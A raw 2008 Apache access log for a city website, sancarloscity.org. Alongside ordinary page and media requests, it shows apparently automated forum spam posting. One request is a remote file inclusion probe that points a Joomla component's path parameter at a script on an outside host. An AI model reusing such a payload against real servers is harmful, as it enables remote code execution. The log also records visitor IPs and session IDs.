78.110.175.11 - - [15/Nov/2008:04:37:52 -0800] "POST /jodera2/profile.php HTTP/1.0" 200 32041 "http://sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:37:54 -0800] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:37:55 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:37:56 -0800] "GET /jodera2/index.php?sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 55152 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:37:57 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41362 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:00 -0800] "GET / HTTP/1.1" 200 44225 "http://www.google.com/search?hl=en&q=sancarloscity.org&aq=f&oq=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:03 -0800] "GET /antenna.css HTTP/1.1" 200 1748 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:03 -0800] "GET /autoactivate.js HTTP/1.1" 200 5474 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:03 -0800] "GET /background_scci_top.jpg HTTP/1.1" 200 69602 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:03 -0800] "GET /sccirtpan1.jpg HTTP/1.1" 200 25068 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:03 -0800] "GET /360maps.jpg HTTP/1.1" 200 12355 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /bg_glass_bottomright3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /sccinewsidepan1.jpg HTTP/1.1" 200 29777 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /bg_red_aurora.jpg HTTP/1.1" 200 32099 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /wheretostaytab2.jpg HTTP/1.1" 200 26860 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /sampo/ HTTP/1.1" 200 2268 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:04 -0800] "GET /frontbanner.swf HTTP/1.1" 200 547694 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:05 -0800] "GET /wheretostaytab1.jpg HTTP/1.1" 200 25858 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:05 -0800] "GET /wheretoeattab2.jpg HTTP/1.1" 200 26730 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:05 -0800] "GET /wheretoeattab1.jpg HTTP/1.1" 200 25761 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:05 -0800] "GET /whattodotab2.jpg HTTP/1.1" 200 26426 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /whattodotab1.jpg HTTP/1.1" 200 25422 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /whattoseetab2.jpg HTTP/1.1" 200 26704 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /whattoseetab1.jpg HTTP/1.1" 200 25736 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /sccilinksicons.jpg HTTP/1.1" 200 33512 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /bg_glass_bottomleft3.jpg HTTP/1.1" 200 18715 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /sccimidline.jpg HTTP/1.1" 200 22936 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:06 -0800] "GET /qfalconbanner.jpg HTTP/1.1" 200 13256 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /lolanitangslogofrnt.jpg HTTP/1.1" 200 4651 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /ymblogo2new.gif HTTP/1.1" 200 8010 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /carmelslogo.jpg HTTP/1.1" 200 5824 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /fireworks08.jpg HTTP/1.1" 200 67156 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /sccinewsearch.jpg HTTP/1.1" 200 22686 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /sccisamplepage_02.gif HTTP/1.1" 200 7431 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /newpanmaster.png HTTP/1.1" 200 943 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /newpanmaster2.png HTTP/1.1" 200 927 "http://www.sancarloscity.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:07 -0800] "GET /sampo/AC_RunActiveContent.js HTTP/1.1" 200 8029 "http://sancarloscity.org/sampo/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:10 -0800] "GET /sampo/Multichannel.swf HTTP/1.1" 200 70433 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:38:10 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11440 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:10 -0800] "GET /sampo/xml/Dateline.xml HTTP/1.1" 200 78423 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/playlist.css HTTP/1.1" 200 559 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/2.jpg HTTP/1.1" 200 14787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/1.jpg HTTP/1.1" 200 14522 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/3.jpg HTTP/1.1" 200 14799 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/4.jpg HTTP/1.1" 200 14789 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/5.jpg HTTP/1.1" 200 14859 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/2.jpg HTTP/1.1" 200 14787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/1.jpg HTTP/1.1" 200 14522 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/3.jpg HTTP/1.1" 200 14799 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/4.jpg HTTP/1.1" 200 14789 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:38:11 -0800] "GET /jodera2/viewtopic.php?p=42444 HTTP/1.0" 200 36477 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:11 -0800] "GET /sampo/flv/11132008/5.jpg HTTP/1.1" 200 14859 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:38:24 -0800] "GET /jodera2/viewforum.php?f=1&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 86244 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:38:46 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41362 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
193.47.80.36 - - [15/Nov/2008:04:38:48 -0800] "GET /forum2/index.php?automodule=blog&blogid=3&showentry=66 HTTP/1.1" 200 20600 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:58 -0800] "GET /sampo/flv/11132008/6.jpg HTTP/1.1" 200 14612 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:59 -0800] "GET /sampo/flv/11132008/7.jpg HTTP/1.1" 200 14672 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:38:59 -0800] "GET /sampo/flv/11132008/8.jpg HTTP/1.1" 200 14901 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:00 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11440 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:01 -0800] "GET /jodera2/viewtopic.php?p=42445 HTTP/1.0" 200 36886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:03 -0800] "GET /jodera2/viewforum.php?f=2&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 83016 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:05 -0800] "GET /sampo/flv/11132008/1.flv HTTP/1.1" 200 19162895 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:06 -0800] "GET /sampo/flv/11132008/9.jpg HTTP/1.1" 200 14850 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:15 -0800] "GET /sampo/flv/11132008/6.flv HTTP/1.1" 200 3801088 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:16 -0800] "GET /sampo/flv/11132008/10.jpg HTTP/1.1" 200 14510 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:16 -0800] "GET /sampo/flv/11132008/11.jpg HTTP/1.1" 200 14825 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:16 -0800] "GET /sampo/flv/10282008/1.jpg HTTP/1.1" 200 14796 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:16 -0800] "GET /sampo/flv/11132008/7.flv HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:17 -0800] "GET /sampo/flv/11132008/9.flv HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:25 -0800] "GET /jodera2/posting.php?mode=newtopic&f=2 HTTP/1.0" 200 41359 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:39:33 -0800] "GET /sampo/flv/11132008/8.flv HTTP/1.1" 200 6528181 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:38 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11440 "http://sancarloscity.org/jodera2/posting.php?mode=newtopic&f=2" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:39 -0800] "GET /jodera2/viewtopic.php?p=42446 HTTP/1.0" 200 36317 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:39:41 -0800] "GET /jodera2/viewforum.php?f=6&sid=1466860e65dbb9fce77b6c0015e6c801 HTTP/1.0" 200 82992 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:39:55 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:39:56 -0800] "GET /forum2/index.php?act=calendar HTTP/1.0" 200 31458 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:39:56 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d HTTP/1.0" 200 12362 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:39:57 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:39:57 -0800] "GET /listings/listing/results.php?letter=r&category_id=739 HTTP/1.0" 200 25573 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:39:58 -0800] "GET /jodera2/posting.php?mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d HTTP/1.0" 200 40970 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
78.110.175.11 - - [15/Nov/2008:04:40:05 -0800] "GET /jodera2/posting.php?mode=newtopic&f=6 HTTP/1.0" 200 41351 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:07 -0800] "GET /sampo/flv/10282008/2.jpg HTTP/1.1" 200 14318 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:11 -0800] "GET /sampo/flv/10282008/4.jpg HTTP/1.1" 200 14280 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:11 -0800] "GET /sampo/flv/10282008/3.jpg HTTP/1.1" 200 14918 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:12 -0800] "GET /sampo/flv/10282008/5.jpg HTTP/1.1" 200 14734 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:12 -0800] "GET /sampo/flv/10282008/6.jpg HTTP/1.1" 200 14389 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:13 -0800] "GET /sampo/flv/10282008/7.jpg HTTP/1.1" 200 14476 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:13 -0800] "GET /sampo/flv/10282008/8.jpg HTTP/1.1" 200 14468 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:15 -0800] "GET /listings/listing/review.php?listing_id=14837 HTTP/1.1" 200 21459 "http://www.google.com/search?q=DYRS+radio&rls=com.microsoft:en-us:IE-SearchBox&ie=UTF-8&oe=UTF-8&sourceid=ie7&rlz=1I7GZEZ" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:04:40:15 -0800] "GET /jodera2/posting.php?mode=reply&t=32674 HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32674" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:15 -0800] "GET /sampo/flv/10282008/9.jpg HTTP/1.1" 200 14463 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:04:40:16 -0800] "GET /jodera2/login.php?redirect=posting.php&mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374 HTTP/1.0" 200 12363 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:16 -0800] "GET /sampo/flv/10282008/10.jpg HTTP/1.1" 200 14398 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:04:40:18 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php?redirect=posting.php&mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7" "www.sancarloscity.org"
89.149.227.208 - - [15/Nov/2008:04:40:18 -0800] "GET /jodera2/posting.php?mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374 HTTP/1.0" 200 50526 "http://www.sancarloscity.org/jodera2/posting.php?mode=reply&t=32674&sid=73c44ac7f6f553fae38fc300d5ef5374" "Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.5) Gecko/20031007 Firebird/0.7" "www.sancarloscity.org"
122.55.21.35 - - [15/Nov/2008:04:40:19 -0800] "GET /listings/layout/general_structure.css HTTP/1.1" 200 28444 "http://www.sancarloscity.org/listings/listing/review.php?listing_id=14837" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727)" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:40:20 -0800] "POST /jodera2/posting.php HTTP/1.0" 200 11444 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1&sid=61380047e212ffe1a265639542fc665d" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:21 -0800] "GET /sampo/flv/10282008/11.jpg HTTP/1.1" 200 14334 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "sancarloscity.org"
213.189.20.67 - - [15/Nov/2008:04:40:21 -0800] "GET /logs/access_080928.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.easysupportdesk.com/cache/id.txt??? HTTP/1.1" 404 830 "-" "libwww-perl/5.803" "www.sancarloscity.org"
84.16.230.107 - - [15/Nov/2008:04:40:22 -0800] "GET /jodera2/viewtopic.php?p=42447 HTTP/1.0" 200 31513 "http://www.sancarloscity.org/viewtopic.php?p=42447#42447" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031016 K-Meleon/0.8.2" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:40:23 -0800] "GET /sampo/flv/11132008/10.flv HTTP/1.1" 200 5242880 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
82.99.30.26 - - [15/Nov/2008:04:40:23 -0800] "GET /jodera2/memberlist.php?sid=5a11e879970ab76101181bd544d0d297 HTTP/1.0" 200 80951 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.sancarloscity.org"
